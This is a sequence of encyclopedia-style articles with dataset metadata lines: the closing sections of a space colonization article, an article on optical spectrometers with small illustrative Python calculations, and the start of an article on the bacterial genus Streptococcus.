deuterium and helium-3. Zubrin suggested that Saturn would be the most important and valuable as it is the closest and has an extensive satellite system. Jupiter's high gravity makes it difficult to extract gases from its atmosphere, and its strong radiation belt makes developing its system difficult. On the other hand, fusion power has yet to be achieved, and fusion power from helium-3 is more difficult to achieve than conventional deuterium–tritium fusion. Jeffrey Van Cleve, Carl Grillmair, and Mark Hanna instead focus on Uranus, because the delta-v required to get helium-3 from the atmosphere into orbit is half that needed for Jupiter, and because Uranus' atmosphere is five times richer in helium than Saturn's. Jupiter's Galilean moons (Io, Europa, Ganymede, and Callisto) and Saturn's Titan are the only moons that have gravities comparable to Earth's Moon. The Moon has a 0.17g gravity; Io, 0.18g; Europa, 0.13g; Ganymede, 0.15g; Callisto, 0.13g; and Titan, 0.14g. Neptune's Triton has about half the Moon's gravity (0.08g); other round moons provide even less (starting from Uranus' Titania and Oberon at about 0.04g). Jovian moons The Jovian system in general has particular disadvantages for colonization, including a deep gravity well. The magnetosphere of Jupiter bombards the moons of Jupiter with intense ionizing radiation delivering about 36 Sv per day to unshielded colonists on Io and about 5.40 Sv per day on Europa. Exposure to about 0.75 Sv over a few days is enough to cause radiation poisoning, and about 5 Sv over a few days is fatal. Jupiter itself, like the other gas giants, has further disadvantages. 
There is no accessible surface on which to land, and the light hydrogen atmosphere would not provide good buoyancy for any kind of aerial habitat, as has been proposed for Venus. Radiation levels on Io and Europa are extreme, enough to kill unshielded humans within an Earth day. Therefore, only Callisto and perhaps Ganymede could reasonably support a human colony. Callisto orbits outside Jupiter's radiation belt. Ganymede's low latitudes are partially shielded by the moon's magnetic field, though not enough to completely remove the need for radiation shielding. Both of them have available water, silicate rock, and metals that could be mined and used for construction. Although Io's volcanism and tidal heating constitute valuable resources, exploiting them is probably impractical. Europa is rich in water (its subsurface ocean is expected to contain over twice as much water as all Earth's oceans together) and likely oxygen, but metals and minerals would have to be imported. If alien microbial life exists on Europa, human immune systems may not protect against it. Sufficient radiation shielding might, however, make Europa an interesting location for a research base. The private Artemis Project drafted a plan in 1997 to colonize Europa, involving surface igloos as bases to drill down into the ice and explore the ocean underneath, and suggesting that humans could live in "air pockets" in the ice layer. Ganymede and Callisto are also expected to have internal oceans. It might be possible to build a surface base that would produce fuel for further exploration of the Solar System. In 2003, NASA performed a study called HOPE (Revolutionary Concepts for Human Outer Planet Exploration) regarding the future exploration of the Solar System. The target chosen was Callisto, due to its distance from Jupiter and thus from the planet's harmful radiation. HOPE estimated a round trip time for a crewed mission of about 2–5 years, assuming significant progress in propulsion technologies. Io is not ideal for colonization, due to its hostile environment. The moon is under the influence of strong tidal forces, which drive its high volcanic activity. Jupiter's strong radiation belt also envelops Io, delivering 36 Sv a day to the moon. The moon is also extremely dry. Io is thus the least suitable of the four Galilean moons for colonization. Despite this, its volcanoes could serve as energy resources for the other moons, which are better suited to colonization. Ganymede is the largest moon in the Solar System. Ganymede is the only moon with a magnetosphere, albeit one overshadowed by Jupiter's magnetic field. Because of this magnetic field, Ganymede is one of only two Jovian moons where surface settlements would be feasible, receiving about 0.08 Sv of radiation per day. It has even been suggested that Ganymede could be terraformed. The Keck Observatory announced in 2006 that the binary Jupiter trojan 617 Patroclus, and possibly many other Jupiter trojans, are likely composed of water ice with a layer of dust. This suggests that mining water and other volatiles in this region and transporting them elsewhere in the Solar System, perhaps via the proposed Interplanetary Transport Network, may be feasible in the not-so-distant future. This could make colonization of the Moon, Mercury and main-belt asteroids more practical. Saturn Saturn's radiation belt is much weaker than Jupiter's, so radiation is less of an issue here. 
Saturn has seven moons large enough to be round: in order of increasing distance from Saturn, they are Mimas, Enceladus, Tethys, Dione, Rhea, Titan, and Iapetus. Of these, Dione, Rhea, Titan, and Iapetus all orbit outside the radiation belt, and Titan's thick atmosphere would adequately shield against cosmic radiation. Enceladus The small moon Enceladus is also of interest, having a subsurface ocean that is separated from the surface by only tens of meters of ice at the south pole, compared to kilometers of ice separating the ocean from the surface on Europa. Volatile and organic compounds are present there, and the moon's high density for an ice world (1.6 g/cm³) indicates that its core is rich in silicates. On 9 March 2006, NASA's Cassini space probe found possible evidence of liquid water on Enceladus; according to the announcement, "pockets of liquid water may be no more than tens of meters below the surface." These findings were confirmed in 2014 by NASA. This means liquid water could be collected much more easily and safely on Enceladus than, for instance, on Europa (see above). The discovery of water, especially liquid water, generally makes a celestial body a much more likely candidate for colonization. An alternative model of Enceladus's activity is the decomposition of methane/water clathrates – a process requiring lower temperatures than liquid water eruptions. The higher density of Enceladus indicates a silicate core larger than the Saturnian average, which could provide materials for base operations. Titan Trans-Neptunian region Beyond the Solar System Beyond the Solar System, colonization targets might be identified around nearby stars. The main difficulty is the vast distances to other stars: with current technology, travel times of millennia would be necessary to reach such targets. At average speeds of even 0.1% of the speed of light (c), interstellar expansion across the entire Milky Way galaxy would take up to one-half of the Sun's galactic orbital period of ~240,000,000 years, which is comparable to the timescale of other galactic processes. Due to fundamental energy and reaction-mass considerations, such speeds would, with current technology, be limited to small spaceships. If humanity were to gain access to a large amount of energy, on the order of the mass-energy of entire planets, it may become possible to construct spaceships with Alcubierre drives. The following are plausible approaches with current technology:
A generation ship which would travel much slower than light, with consequent interstellar trip times of many decades or centuries. The crew would go through generations before the journey was complete, so none of the initial crew would be expected to survive to arrive at the destination, assuming current human lifespans.
A sleeper ship, where most or all of the crew spend the journey in some form of hibernation or suspended animation, allowing some or all to reach the destination.
An embryo-carrying interstellar starship (EIS), much smaller than a generation ship or sleeper ship, transporting human embryos or DNA in a frozen or dormant state to the destination. (Obvious biological and psychological problems in birthing, raising, and educating such voyagers, neglected here, may not be fundamental.)
A nuclear fusion or fission powered ship (e.g. ion drive) of some kind, achieving velocities of up to perhaps 10% of c, permitting one-way trips to nearby stars with durations comparable to a human lifetime. 
A Project Orion ship, a nuclear-pulse propulsion concept championed by Freeman Dyson, which would use nuclear explosions to propel a starship. A special case of the preceding nuclear rocket concepts, with similar potential velocity capability, but possibly easier technology.
Laser propulsion concepts, using some form of beaming of power from the Solar System, might allow a light-sail or other ship to reach high speeds, comparable to those theoretically attainable by the fusion-powered electric rocket, above. These methods would need some means, such as supplementary nuclear propulsion, to stop at the destination, but a hybrid (light-sail for acceleration, fusion-electric for deceleration) system might be possible.
Uploaded human minds or artificial intelligence may be transmitted via radio or laser at light speed to interstellar destinations where self-replicating spacecraft have traveled subluminally and set up infrastructure, and possibly also brought some minds. Extraterrestrial intelligence might be another viable destination.
Intergalactic travel The distances between galaxies are on the order of a million times farther than those between the stars, and thus intergalactic colonization would involve voyages of millions of years via special self-sustaining methods. Implementation Building colonies in space would require access to water, food, space, people, construction materials, energy, transportation, communications, life support, simulated gravity, radiation protection, migration, governance and capital investment. It is likely the colonies would be located near the necessary physical resources. The practice of space architecture seeks to transform spaceflight from a heroic test of human endurance to a normality within the bounds of comfortable experience. As is true of other frontier-opening endeavors, the capital investment necessary for space colonization would probably come from governments, an argument made by John Hickman and Neil deGrasse Tyson. Migration Human spaceflight has enabled only the temporary relocation of a few privileged people, and no permanent space migrants. The societal motivation for space migration has been questioned as rooted in colonialism, with critics questioning the fundamentals and inclusivity of space colonization and highlighting the need to reflect on such socio-economic issues besides the technical challenges of implementation. Governance A range of different models of transplanetary or extraterrestrial governance have been sketched or proposed, often envisioning the need for fresh or independent extraterrestrial governance, particularly in the void left by what critics see as a contemporary lack of inclusive space governance. It has been argued that space colonialism would, similarly to terrestrial settler colonialism, produce colonial national identities. Federalism has been studied as a remedy for governing such distant and autonomous communities. Life support In space settlements, a life support system must recycle or import all the nutrients without "crashing." The closest terrestrial analogue to space life support is possibly that of a nuclear submarine. Nuclear submarines use mechanical life support systems to support humans for months without surfacing, and this same basic technology could presumably be employed for space use. However, nuclear submarines run "open loop"—extracting oxygen from seawater and typically dumping carbon dioxide overboard, although they recycle existing oxygen. 
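To give a sense of the scale that recycling addresses, here is a rough sketch of a crew's consumable mass budget. The per-person daily rates are approximate, commonly cited design figures and should be treated as assumptions, not as numbers from the source:

```python
# Sketch: rough consumable mass for an open-loop versus partially closed
# life support system. Per-person daily rates below are assumed,
# commonly cited approximations.
O2_KG_PER_DAY = 0.84      # oxygen consumed per person
WATER_KG_PER_DAY = 3.5    # drinking and hygiene water per person
FOOD_KG_PER_DAY = 0.62    # dry food per person

def supply_mass(crew, days, water_recycling=0.0, o2_recycling=0.0):
    """Total consumable mass to launch, given recycling fractions (0..1)."""
    o2 = O2_KG_PER_DAY * (1 - o2_recycling) * crew * days
    water = WATER_KG_PER_DAY * (1 - water_recycling) * crew * days
    food = FOOD_KG_PER_DAY * crew * days  # food is not recycled here
    return o2 + water + food

# Open loop versus 90% water / 75% oxygen recovery, 6 people for 2 years:
print(f"open loop: {supply_mass(6, 730):,.0f} kg")
print(f"recycling: {supply_mass(6, 730, 0.90, 0.75):,.0f} kg")
```

Under these assumed rates, recycling cuts the two-year consumable mass from roughly 22 tonnes to about 5 tonnes, which is why closing the loop matters so much.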
Another commonly proposed life-support system is a closed ecological system such as Biosphere 2. Solutions to health risks Although there are many physical, mental, and emotional health risks for future colonists and pioneers, solutions have been proposed to correct these problems. Mars500, HI-SEAS, and SMART-OP represent efforts to help reduce the effects of loneliness and confinement for long periods of time. Keeping contact with family members, celebrating holidays, and maintaining cultural identities all had an impact on minimizing the deterioration of mental health. There are also health tools in development to help astronauts reduce anxiety, as well as helpful tips to reduce the spread of germs and bacteria in a closed environment. Radiation risk may be reduced for astronauts by frequent monitoring and by focusing work to minimize time away from shielding. Future space agencies can also ensure that every colonist has a mandatory amount of daily exercise to prevent muscle degradation. Radiation protection Cosmic rays and solar flares create a lethal radiation environment in space. In orbit around certain planets with magnetospheres (including Earth), the Van Allen belts make living above the atmosphere difficult. To protect life, settlements must be surrounded by sufficient mass to absorb most incoming radiation, unless magnetic or plasma radiation shields are developed. In the case of the Van Allen belts, these could be drained using orbiting tethers or radio waves. Passive mass shielding of four metric tons per square meter of surface area would reduce the radiation dosage to several mSv or less annually, well below the rate of some populated high-natural-background areas on Earth. This can be leftover material (slag) from processing lunar soil and asteroids into oxygen, metals, and other useful materials. However, such massive bulk represents a significant obstacle to maneuvering vessels (mobile spacecraft being particularly likely to use less massive active shielding). Inertia would necessitate powerful thrusters to start or stop rotation, or electric motors to spin two massive portions of a vessel in opposite senses. Shielding material can be stationary around a rotating interior. Psychological adjustment The monotony and loneliness that come from a prolonged space mission can leave astronauts susceptible to cabin fever or psychotic breaks. Moreover, lack of sleep, fatigue, and work overload can affect an astronaut's ability to perform well in an environment such as space where every action is critical. Economics Space colonization can roughly be said to become possible when the necessary methods (such as space access via cheaper launch systems) become cheap enough to be covered by the cumulative funds gathered for the purpose, in addition to estimated profits from the commercial use of space. Although there are no immediate prospects for the large amounts of money required for space colonization to be available given traditional launch costs, there was some prospect of a radical reduction in launch costs in the 2010s, which would consequently lessen the cost of any efforts in that direction. With its published per-launch price for payloads to low Earth orbit, SpaceX's Falcon 9 rockets are already the "cheapest in the industry". 
Advancements currently being developed as part of the SpaceX reusable launch system development program to enable reusable Falcon 9s "could drop the price by an order of magnitude, sparking more space-based enterprise, which in turn would drop the cost of access to space still further through economies of scale." If SpaceX is successful in developing the reusable technology, it would be expected to "have a major impact on the cost of access to space", and change the increasingly competitive market in space launch services. The President's Commission on Implementation of United States Space Exploration Policy suggested that an inducement prize should be established, perhaps by government, for the achievement of space colonization, for example by offering the prize to the first organization to place humans on the Moon and sustain them for a fixed period before they return to Earth. Money and currency Experts have debated the possible use of money and currencies in societies that will be established in space. The Quasi Universal Intergalactic Denomination, or QUID, is a physical currency made from a space-qualified polymer, PTFE, for inter-planetary travelers. QUID was designed for the foreign exchange company Travelex by scientists from Britain's National Space Centre and the University of Leicester. Other possibilities include the incorporation of cryptocurrency as the primary form of currency, as suggested by Elon Musk. Resources Colonies on the Moon, Mars, asteroids, or the metal-rich planet Mercury could extract local materials. The Moon is deficient in volatiles such as argon, helium and compounds of carbon, hydrogen and nitrogen. The LCROSS impactor was targeted at the Cabeus crater, which was chosen as having a high concentration of water for the Moon. A plume of material erupted, in which some water was detected. Mission chief scientist Anthony Colaprete estimated that the Cabeus crater contains material with 1% water or possibly more. Water ice should also be present in other permanently shadowed craters near the lunar poles. Although helium is present only in low concentrations on the Moon, where it is deposited into the regolith by the solar wind, an estimated million tons of He-3 exists overall. The Moon also has industrially significant oxygen, silicon, and metals such as iron, aluminium, and titanium. Launching materials from Earth is expensive, so bulk materials for colonies could come from the Moon, a near-Earth object (NEO), Phobos, or Deimos. The benefits of using such sources include: a lower gravitational force, no atmospheric drag on cargo vessels, and no biosphere to damage. Many NEOs contain substantial amounts of metals. Some other NEOs are inactive comets that, underneath a drier outer crust (much like oil shale), include billions of tons of water ice and kerogen hydrocarbons, as well as some nitrogen compounds. Farther out, Jupiter's Trojan asteroids are thought to be rich in water ice and other volatiles. Recycling of some raw materials would almost certainly be necessary. Energy Solar energy in orbit is abundant, reliable, and commonly used to power satellites today. There is no night in free space, and no clouds or atmosphere to block sunlight. Light intensity obeys an inverse-square law, so the solar energy available at distance d from the Sun is E = 1367/d² W/m², where d is measured in astronomical units (AU) and 1367 W/m² is the energy available at the distance of Earth's orbit from the Sun, 1 AU. 
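A minimal sketch implementing exactly this inverse-square relation, evaluated at a few representative orbital distances (the distances in AU are standard approximate values):

```python
# Sketch: solar flux versus distance, using E = 1367 / d^2 (W/m^2, d in AU)
# as quoted above.
def solar_flux(d_au: float) -> float:
    """Approximate solar flux in W/m^2 at d_au astronomical units."""
    return 1367.0 / d_au ** 2

for body, d in [("Mercury", 0.39), ("Earth", 1.0), ("Mars", 1.52), ("Jupiter", 5.2)]:
    print(f"{body} ({d} AU): {solar_flux(d):.0f} W/m^2")
```

This reproduces the figures used elsewhere in the text: roughly 9,000 W/m² at Mercury (about 6.5 times Earth's flux) and about 590 W/m², or 43% of Earth's value, at Mars.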
In the weightlessness and vacuum of space, high temperatures for industrial processes can easily be achieved in solar ovens with huge parabolic reflectors made of metallic foil with very lightweight support structures. Flat mirrors to reflect sunlight around radiation shields into living areas (to avoid line-of-sight access for cosmic rays, or to make the Sun's image appear to move across their "sky") or onto crops are even lighter and easier to build. Large solar power photovoltaic cell arrays or thermal power plants would be needed to meet the electrical power needs of the settlers. In developed parts of Earth, electrical consumption can average 1 kilowatt per person (or roughly 10 megawatt-hours per person per year). These power plants could be at a short distance from the main structures if wires are used to transmit the power, or much farther away with wireless power transmission. A major export of the initial space settlement designs was anticipated to be large solar power satellites (SPS) that would use wireless power transmission (phase-locked microwave beams or lasers emitting wavelengths that special solar cells convert with high efficiency) to send power to locations on Earth, or to colonies on the Moon or other locations in space. For locations on Earth, this method of getting power is extremely benign, with zero emissions and far less ground area required per watt than for conventional solar panels. Once these satellites are primarily built from lunar or asteroid-derived materials, the price of SPS electricity could be lower than energy from fossil fuel or nuclear energy; replacing these would have significant benefits such as the elimination of greenhouse gases and nuclear waste from electricity generation. Transmitting solar energy wirelessly from the Earth to the Moon and back is also an idea proposed for the benefit of space colonization and energy resources. Physicist David Criswell, who worked for NASA during the Apollo missions, proposed the idea of using power beams to transfer energy from space. These beams, microwaves with a wavelength of about 12 cm, would be almost unattenuated as they travel through the atmosphere. They could also be aimed at more industrial areas to keep away from human or animal activities. This would allow for safer and more reliable methods of transferring solar energy. In 2008, scientists were able to send a 20-watt microwave signal from a mountain on the island of Maui to the island of Hawaii. Since then, JAXA and Mitsubishi have been working together on a $21 billion project to place satellites in orbit which could generate up to 1 gigawatt of power. These are among the advances being pursued today to transmit energy wirelessly for space-based solar energy. However, the value of SPS power delivered wirelessly to other locations in space will typically be far higher than to Earth. Otherwise, the means of generating the power would need to be included with these projects and pay the heavy penalty of Earth launch costs. Therefore, other than proposed demonstration projects for power delivered to Earth, the first priority for SPS electricity is likely to be locations in space, such as communications satellites, fuel depots or "orbital tugboat" boosters transferring cargo and passengers between low Earth orbit (LEO) and other orbits such as geosynchronous orbit (GEO), lunar orbit or highly eccentric Earth orbit (HEEO). The system would also rely on satellites and receiving stations on Earth to convert the energy into electricity. 
Because this energy can be transmitted easily from dayside to nightside, power would be reliable 24/7. Nuclear power is sometimes proposed for colonies located on the Moon or on Mars, as the supply of solar energy is too discontinuous in these locations; the Moon has nights of two Earth weeks in duration. Mars has nights, relatively high gravity, and an atmosphere featuring large dust storms that can cover and degrade solar panels. Also, Mars' greater distance from the Sun (1.52 astronomical units, AU) means that only 1/1.52², or about 43%, of the solar energy is available at Mars compared with Earth orbit. Another method would be transmitting energy wirelessly to the lunar or Martian colonies from solar power satellites (SPSs) as described above; the difficulties of generating power in these locations make the relative advantages of SPSs much greater there than for power beamed to locations on Earth. To fulfill the requirements of a Moon base, with energy to supply life support, maintenance, communications, and research, a combination of both nuclear and solar energy may be used in the first colonies. For both solar thermal and nuclear power generation in airless environments, such as the Moon and space, and to a lesser extent the very thin Martian atmosphere, one of the main difficulties is dispersing the inevitable heat generated. This requires fairly large radiator areas. Self-replication Space manufacturing could enable self-replication. Some consider it the ultimate goal because it would allow an exponential increase in colonies, while eliminating costs to, and dependence on, Earth. It could be argued that the establishment of such a colony would be Earth's first act of self-replication. Intermediate goals include colonies that expect only information from Earth (science, engineering, entertainment) and colonies that just require periodic supply of lightweight objects, such as integrated circuits, medicines, genetic material and tools. Population size In 2002, the anthropologist John H. Moore estimated that a population of 150–180 would permit a stable society to exist for 60 to 80 generations—equivalent to 2,000 years. Assuming a journey of 6,300 years, the astrophysicist Frédéric Marin and the particle physicist Camille Beluffi calculated that the minimum viable population for a generation ship to reach Proxima Centauri would be 98 settlers at the beginning of the mission (the crew would then breed until reaching a stable population of several hundred settlers within the ship). In 2020, Jean-Marc Salotti proposed a method to determine the minimum number of settlers needed to survive on an extraterrestrial world, based on a comparison between the time required to perform all necessary activities and the working time of all available settlers. For Mars, 110 individuals would be required. Advocacy Several private companies have announced plans toward the colonization of Mars. Among entrepreneurs leading the call for space colonization are Elon Musk, Dennis Tito and Bas Lansdorp. Involved organizations Organizations that contribute to space colonization include:
The National Space Society (NSS) is an organization with the vision of people living and working in thriving communities beyond the Earth. The NSS also maintains an extensive library of full-text articles and books on space settlement.
The Space Frontier Foundation performs space advocacy, including strong free-market, capitalist views about space development. 
The Mars Society promotes Robert Zubrin's Mars Direct plan and the settlement of Mars.
The Space Settlement Institute is searching for ways to make space colonization happen within a lifetime.
SpaceX is developing extensive spaceflight transportation infrastructure with the express purpose of enabling long-term human settlement of Mars.
The Space Studies Institute funds the study of outer space settlements, especially O'Neill cylinders.
The Alliance to Rescue Civilization plans to establish backups of human civilization on the Moon and other locations away from Earth.
The Artemis Project plans to set up a private lunar surface station.
The British Interplanetary Society (BIS) promotes ideas for the exploration and use of space, including a Mars colony, future propulsion systems (see Project Daedalus), terraforming, and locating other habitable worlds. In June 2013 the BIS began the SPACE project to re-examine Gerard O'Neill's 1970s space colony studies in light of the advances made since then. The progress of this effort was detailed in a special edition of the BIS journal in September 2019.
Asgardia (nation), an organization seeking to circumvent the limitations placed by the Outer Space Treaty.
The Cyprus Space Exploration Organisation promotes space exploration and colonization, and fosters collaboration in space.
Terrestrial analogues to space settlement Many space agencies build "testbeds", which are facilities on Earth for testing advanced life support systems, but these are designed for long-duration human spaceflight, not permanent colonization. The most famous attempt to build an analogue to a self-sufficient settlement is Biosphere 2, which attempted to duplicate Earth's biosphere. BIOS-3 is another closed ecosystem, completed in 1972 in Krasnoyarsk, Siberia. The Mars Desert Research Station has a habitat for similar reasons, but the surrounding climate is not strictly inhospitable. The Devon Island Mars Arctic Research Station can also provide some practice for off-world outpost construction and operation. In media and fiction Although established space habitats are a stock element in science fiction stories, fictional works that explore the themes, social or practical, of the settlement and occupation of a habitable world are rarer. Solaris is noted for its critique of space colonization of inhabited planets. In 2022, Rudolph Herzog and Werner Herzog presented an in-depth documentary with Lucianne Walkowicz called Last Exit: Space.
Technology
Basics_6
null
29293
https://en.wikipedia.org/wiki/Optical%20spectrometer
Optical spectrometer
An optical spectrometer (spectrophotometer, spectrograph or spectroscope) is an instrument used to measure properties of light over a specific portion of the electromagnetic spectrum, typically used in spectroscopic analysis to identify materials. The variable measured is most often the irradiance of the light but could also, for instance, be the polarization state. The independent variable is usually the wavelength of the light or a closely derived physical quantity, such as the corresponding wavenumber or the photon energy, in units of measurement such as centimeters, reciprocal centimeters, or electron volts, respectively. A spectrometer is used in spectroscopy for producing spectral lines and measuring their wavelengths and intensities. Spectrometers may operate over a wide range of non-optical wavelengths, from gamma rays and X-rays into the far infrared. If the instrument is designed to measure the spectrum on an absolute scale rather than a relative one, then it is typically called a spectrophotometer. The majority of spectrophotometers are used in spectral regions near the visible spectrum. A spectrometer that is calibrated for measurement of the incident optical power is called a spectroradiometer. In general, any particular instrument will operate over a small portion of this total range because of the different techniques used to measure different portions of the spectrum. Below optical frequencies (that is, at microwave and radio frequencies), the spectrum analyzer is a closely related electronic device. Spectrometers are used in many fields. For example, they are used in astronomy to analyze the radiation from objects and deduce their chemical composition. The spectrometer uses a prism or a grating to spread the light into a spectrum. This allows astronomers to detect many of the chemical elements by their characteristic spectral lines. These lines are named for the elements which cause them, such as the hydrogen alpha, beta, and gamma lines. A glowing object will show bright spectral lines. Dark lines are made by absorption, for example by light passing through a gas cloud, and these absorption lines can also identify chemical compounds. Much of our knowledge of the chemical makeup of the universe comes from spectra. Spectroscopes Spectroscopes are often used in astronomy and some branches of chemistry. Early spectroscopes were simply prisms with graduations marking wavelengths of light. Modern spectroscopes generally use a diffraction grating, a movable slit, and some kind of photodetector, all automated and controlled by a computer. Recent advances have seen increasing reliance on computational algorithms in a range of miniaturised spectrometers without diffraction gratings, for example, through the use of quantum dot-based filter arrays onto a CCD chip or a series of photodetectors realised on a single nanostructure. Joseph von Fraunhofer developed the first modern spectroscope by combining a prism, diffraction slit and telescope in a manner that increased the spectral resolution and was reproducible in other laboratories. Fraunhofer also went on to invent the first diffraction spectroscope. Gustav Robert Kirchhoff and Robert Bunsen discovered the application of spectroscopes to chemical analysis and used this approach to discover caesium and rubidium. Kirchhoff and Bunsen's analysis also enabled a chemical explanation of stellar spectra, including Fraunhofer lines. 
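As a purely illustrative sketch (not a production method) of how characteristic lines enable chemical identification, measured peak wavelengths can be compared against a reference table; the tiny reference list and the matching tolerance below are assumptions chosen for illustration:

```python
# Sketch: identify elements by matching measured spectral-line wavelengths
# against a small reference table. Reference values are well-known lines;
# the tolerance is an assumed, illustrative choice.
REFERENCE_LINES_NM = {
    "hydrogen alpha": 656.28,
    "hydrogen beta": 486.13,
    "hydrogen gamma": 434.05,
    "sodium D1": 589.5924,
    "sodium D2": 588.9950,
}

def match_lines(measured_nm, tolerance_nm=0.5):
    """Return reference lines lying within tolerance of any measured peak."""
    hits = {}
    for peak in measured_nm:
        for name, ref in REFERENCE_LINES_NM.items():
            if abs(peak - ref) <= tolerance_nm:
                hits[name] = peak
    return hits

# Three peaks measured from a hypothetical spectrum:
print(match_lines([656.3, 486.2, 589.0]))
```

Real pipelines add peak-finding, wavelength calibration, and line-strength weighting, but the matching step reduces to this kind of nearest-line lookup.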
When a material is heated to incandescence it emits light that is characteristic of the atomic makeup of the material. Particular light frequencies give rise to sharply defined bands on the scale which can be thought of as fingerprints. For example, the element sodium has a very characteristic double yellow band known as the sodium D-lines at 588.9950 and 589.5924 nanometers, the color of which will be familiar to anyone who has seen a low-pressure sodium vapor lamp. In the original spectroscope design in the early 19th century, light entered a slit and a collimating lens transformed the light into a thin beam of parallel rays. The light then passed through a prism (in hand-held spectroscopes, usually an Amici prism) that refracted the beam into a spectrum because different wavelengths were refracted by different amounts due to dispersion. This image was then viewed through a tube with a scale that was transposed upon the spectral image, enabling its direct measurement. With the development of photographic film, the more accurate spectrograph was created. It was based on the same principle as the spectroscope, but it had a camera in place of the viewing tube. In recent years, electronic circuits built around the photomultiplier tube have replaced the camera, allowing real-time spectrographic analysis with far greater accuracy. Arrays of photosensors are also used in place of film in spectrographic systems. Such spectral analysis, or spectroscopy, has become an important scientific tool for analyzing the composition of unknown material and for studying astronomical phenomena and testing astronomical theories. In modern spectrographs in the UV, visible, and near-IR spectral ranges, the spectrum is generally given in the form of photon number per unit wavelength (nm or μm), wavenumber (μm−1, cm−1), frequency (THz), or energy (eV), with the units indicated on the abscissa. In the mid- to far-IR, spectra are typically expressed in units of watts per unit wavelength (μm) or wavenumber (cm−1). In many cases, the spectrum is displayed with the units left implied (such as "digital counts" per spectral channel). In gemology Gemologists frequently use spectroscopes to determine the absorption spectra of gemstones, thereby allowing them to make inferences about what kind of gem they are examining. A gemologist may compare the absorption spectrum they observe with a catalogue of spectra for various gems to help narrow down the exact identity of the gem. Spectrographs A spectrograph is an instrument that separates light into its wavelengths and records the data. A spectrograph typically has a multi-channel detector system or camera that detects and records the spectrum of light. The term was first used in 1876 by Dr. Henry Draper when he invented the earliest version of this device, which he used to take several photographs of the spectrum of Vega. This earliest version of the spectrograph was cumbersome to use and difficult to manage. There are several kinds of machines referred to as spectrographs, depending on the precise nature of the waves. The first spectrographs used photographic paper as the detector. The plant pigment phytochrome was discovered using a spectrograph that used living plants as the detector. More recent spectrographs use electronic detectors, such as CCDs, which can be used for both visible and UV light. The exact choice of detector depends on the wavelengths of light to be recorded. A spectrograph is sometimes called a polychromator, as an analogy to monochromator. 
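A minimal sketch converting a wavelength into the other spectral units discussed above (wavenumber, frequency, and photon energy), using standard physical constants and the sodium D2 line as a worked example:

```python
# Sketch: convert a wavelength to wavenumber, frequency, and photon energy.
H = 6.62607015e-34    # Planck constant, J*s
C = 2.99792458e8      # speed of light, m/s
EV = 1.602176634e-19  # joules per electron volt

def spectral_units(wavelength_nm: float) -> dict:
    lam_m = wavelength_nm * 1e-9
    return {
        "wavenumber_cm^-1": 1.0 / (lam_m * 100),  # 1 m = 100 cm
        "frequency_THz": C / lam_m / 1e12,
        "photon_energy_eV": H * C / lam_m / EV,
    }

# The sodium D2 line quoted above:
print(spectral_units(588.9950))
```

For 588.9950 nm this yields roughly 16,978 cm⁻¹, 509 THz, and 2.10 eV, illustrating how the same spectral feature is expressed on different abscissae.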
Stellar and solar spectrograph The star spectral classification and discovery of the main sequence, Hubble's law and the Hubble sequence were all made with spectrographs that used photographic paper. The James Webb Space Telescope contains both a near-infrared spectrograph (NIRSpec) and a mid-infrared spectrograph (MIRI). Echelle spectrograph An echelle-based spectrograph uses two diffraction gratings, rotated 90 degrees with respect to each other and placed close to one another. Therefore, an entrance point, rather than a slit, is used, and a CCD chip records the spectrum. Both gratings have a wide spacing, and one is blazed so that only the first order is visible while the other is blazed so that many higher orders are visible, so a very fine spectrum is presented to the CCD. Slitless spectrograph In conventional spectrographs, a slit is inserted into the beam to limit the image extent in the dispersion direction. A slitless spectrograph omits the slit; this results in images that convolve the image information with spectral information along the direction of dispersion. If the field is not sufficiently sparse, then spectra from different sources in the image field will overlap. The trade-off is that slitless spectrographs can produce spectral images much more quickly than scanning a conventional spectrograph. That is useful in applications such as solar physics where time evolution is important.
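The dispersive behavior underlying the grating spectrographs described above is governed by the grating equation m·λ = d·(sin θi + sin θm). A minimal sketch, with groove density and geometry chosen as illustrative assumptions:

```python
# Sketch: diffraction angle from the grating equation
# m*lambda = d*(sin(theta_i) + sin(theta_m)).
import math

def diffraction_angle_deg(wavelength_nm, grooves_per_mm=600,
                          incidence_deg=0.0, order=1):
    d_nm = 1e6 / grooves_per_mm  # groove spacing in nm
    s = order * wavelength_nm / d_nm - math.sin(math.radians(incidence_deg))
    if abs(s) > 1:
        raise ValueError("no propagating order for these parameters")
    return math.degrees(math.asin(s))

# A 600 grooves/mm grating at normal incidence spreads the visible range:
for lam in (400, 550, 700):
    print(f"{lam} nm -> {diffraction_angle_deg(lam):.1f} deg")
```

With these assumed parameters, 400 nm emerges near 13.9° and 700 nm near 24.8°, which is the angular spread a detector array samples to record the spectrum.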
Technology
Measuring instruments
null
29318
https://en.wikipedia.org/wiki/Streptococcus
Streptococcus
Streptococcus is a genus of gram-positive, spherical (coccus) bacteria that belongs to the family Streptococcaceae, within the order Lactobacillales (lactic acid bacteria), in the phylum Bacillota. Cell division in streptococci occurs along a single axis, thus when growing they tend to form pairs or chains, which may appear bent or twisted. This differs from staphylococci, which divide along multiple axes, thereby generating irregular, grape-like clusters of cells. Most streptococci are oxidase-negative and catalase-negative, and many are facultative anaerobes (capable of growth both aerobically and anaerobically). The term was coined in 1877 by Viennese surgeon Albert Theodor Billroth (1829–1894), by combining the prefix "strepto-" (from Ancient Greek στρεπτός, "easily twisted, pliant") with the suffix "-coccus" (from Modern Latin coccus, from Ancient Greek κόκκος, "grain, seed, berry"). In 1984, many bacteria formerly grouped in the genus Streptococcus were separated out into the genera Enterococcus and Lactococcus. Currently, over 50 species are recognised in this genus. This genus has been found to be part of the salivary microbiome. Pathogenesis and classification In addition to streptococcal pharyngitis (strep throat), certain Streptococcus species are responsible for many cases of pink eye, meningitis, bacterial pneumonia, endocarditis, erysipelas, and necrotizing fasciitis (the 'flesh-eating' bacterial infections). However, many streptococcal species are not pathogenic, and form part of the commensal human microbiota of the mouth, skin, intestine, and upper respiratory tract. Streptococci are also a necessary ingredient in producing Emmentaler ("Swiss") cheese. Species of streptococci are classified based on their hemolytic properties. Alpha-hemolytic species cause oxidation of iron in hemoglobin molecules within red blood cells, giving colonies a greenish color on blood agar. Beta-hemolytic species cause complete rupture of red blood cells. On blood agar, this appears as wide areas clear of blood cells surrounding bacterial colonies. Gamma-hemolytic species cause no hemolysis. Beta-hemolytic streptococci are further classified by Lancefield grouping, a serotype classification (that is, describing specific carbohydrates present on the bacterial cell wall). The 21 described serotypes are named Lancefield groups A to W (excluding E, I and J). This system of classification was developed by Rebecca Lancefield, a scientist at Rockefeller University. In the medical setting, the most important groups are the alpha-hemolytic streptococci S. pneumoniae and the Streptococcus 